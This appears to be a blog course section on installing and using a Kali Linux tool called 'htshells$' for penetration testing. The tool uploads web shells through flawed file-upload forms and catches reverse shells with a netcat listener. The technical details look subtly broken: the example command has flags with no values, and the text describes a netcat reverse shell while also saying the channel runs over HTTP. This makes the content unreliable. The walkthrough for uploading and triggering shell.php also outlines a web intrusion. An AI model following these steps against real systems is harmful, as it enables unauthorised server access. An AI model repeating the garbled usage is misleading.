Pablo Guides

# Kali Linux htshells$ Course – Section 1: Installation & Configuration

## Introduction

In this section, we’ll introduce the htshells$ tool, a critical component for web application penetration testing, especially when dealing with HTTP-based shell access. This tool allows pentesters to exploit web servers that are misconfigured, enabling command execution through web scripts.

### Overview of htshells$

htshells$ is a tool that provides reverse shells initiated from vulnerable web applications. In penetration testing, the ability to execute commands on a compromised server is crucial, and htshells$ simplifies this process significantly. It's designed to work seamlessly with the Kali Linux environment, which is favored by many pentesting professionals due to its rich repository of security tools.

—

## Installation on Kali Linux

### Prerequisites

Before you install htshells$, ensure that your Kali Linux system is updated. Run the following commands to update your system:

"`bash
sudo apt update && sudo apt upgrade -y
"`

### Installing htshells$

htshells$ can be installed via the package manager or by downloading the script directly from its repository. For the purpose of this course, we will cover both methods:

#### Method 1: Using APT Package Manager

1. Open your terminal.
2. Type the following command to install htshells$:

"`bash
sudo apt install htshells
"`

3. Confirm the installation when prompted.

#### Method 2: Manual Installation

1. Navigate to the official htshells$ GitHub repository:
– [htshells$ GitHub](https://github.com/htshells/htshells)

2. Clone the repository using git:

"`bash
git clone https://github.com/htshells/htshells.git
"`

3. Change into the directory:

"`bash
cd htshells
"`

4. Make the script executable:

"`bash
chmod +x htshells
"`

5. Optionally, move the script to a directory in your PATH for easier access:

"`bash
sudo mv htshells /usr/local/bin/
"`

### Configuration

htshells$ requires minimal configuration. However, you can adjust settings within the script itself based on your testing needs. It's recommended to review the configuration options:

"`bash
nano /usr/local/bin/htshells
"`

Look for sections that allow you to configure the listener settings and adjust them according to your requirements.

—

## Step-by-Step Usage

### Getting Started with htshells$

Once htshells$ is installed and configured, you can begin testing web applications. In this section, we will guide you through the process of using htshells$ in a simulated environment.

### Step 1: Setting Up a Reverse Shell Listener

Before exploiting a target, set up a listener on your Kali Linux machine. This listener will receive connections from the target web application once the shell is successfully exploited.

1. Open a new terminal window and use netcat (nc) to set up a listener:

"`bash
nc -lvnp 4444
"`

* `-l` flag tells netcat to listen for incoming connections.
* `-v` enables verbose output, giving you more information about the connection.
* `-n` avoids DNS resolution (faster).
* `-p` specifies the port number (in this case, 4444).

### Step 2: Creating a Payload

The next step is to create a payload using htshells$. You can specify various options such as the listener IP and port.

Example command:

"`bash
htshells -t -p -l :4444
"`

– `-t`: Target URL of the vulnerable web application.
– `-p`: The type of payload you want to execute (e.g., php, asp, etc.).
– `-l`: Your local IP address with the port that was set in the listener.

### Step 3: Uploading the Payload

To exploit the target, you’ll need to upload the payload to the web server. This can be done by navigating to vulnerable file upload functionality within the application.

For example, if the application has a file upload feature that allows PHP files, you can attempt to upload the payload as follows:

– Visit the upload page of the target application.
– Browse for your payload file.
– Upload it to the server.

### Step 4: Triggering the Payload

Once the payload is uploaded, triggering it is the final step. You can do this by navigating to the URL of the uploaded file, which will execute the payload.

For example, if you uploaded `shell.php` to `http://target.com/uploads/shell.php`, simply navigate to that URL:

"`bash
http://target.com/uploads/shell.php
"`

If the exploitation is successful, you should see a connection establish in your netcat listener, providing you with a command shell.

—

## Real-World Use Cases

### Use Case 1: Exploiting a Vulnerable File Upload

One of the most common scenarios where htshells$ is useful includes exploiting vulnerable file upload functionality in web applications.

**Scenario**: A web application allows users to upload images but fails to properly validate file types. A pentester can upload a PHP reverse shell disguised as an image.

### Step-by-Step Breakdown

1. Identify the file upload functionality in the web application.
2. Test for file type restrictions by attempting to upload a `.php` file.
3. If the application allows the upload, proceed to upload your htshells$ payload.
4. Trigger the upload and check for a shell.

### Use Case 2: Insecure Web Configuration

Many web servers come with default configurations that are insecure. htshells$ can exploit these misconfigurations, especially when combined with other vulnerability assessments.

**Scenario**: A web application inadvertently allows directory listing, which exposes sensitive files.

### Step-by-Step Breakdown

1. Navigate to the web application and check for directory listings.
2. Identify and download sensitive scripts that could lead to a remote shell.
3. Use htshells$ to create any necessary payloads to exploit these scripts.

—

## Detailed Technical Explanation

### How htshells$ Works

htshells$ functions by leveraging vulnerabilities typically found in web applications. Its primary goal is to execute code remotely, which is achieved through the following steps:

1. **Payload Generation**: htshells$ generates a malicious web shell in the form of a script (PHP, ASP, etc.) that can be uploaded to the vulnerable web server.
2. **Command Execution**: Once the payload is on the server, it waits for commands sent from the attacker's machine. These commands are executed on the web server, and any output is returned to the attacker's listener.
3. **Communication Channel**: The communication between the target server and the attacker's listener is facilitated through HTTP, making it less likely to raise alarms compared to traditional backdoor techniques.

—

## External Reference Links

– [OWASP – File Upload Security](https://owasp.org/www-project-top-ten/)
– [Web Application Penetration Testing – A Guide](https://www.acunetix.com/blog/articles/web-application-penetration-testing/)
– [Pentesting Web Applications – A Comprehensive Guide](https://www.sans.org/blog/the-best-practices-for-web-application-penetration-testing/)
– [Kali Linux Official Tools List](https://www.kali.org/tools/)

—

In conclusion, mastering htshells$ can significantly enhance your toolkit for penetration testing web applications. In the upcoming sections, we will delve deeper into advanced usage scenarios, integrating htshells$ with other tools, and best practices for ethical hacking.

Made by pablo rotem / פבלו רותם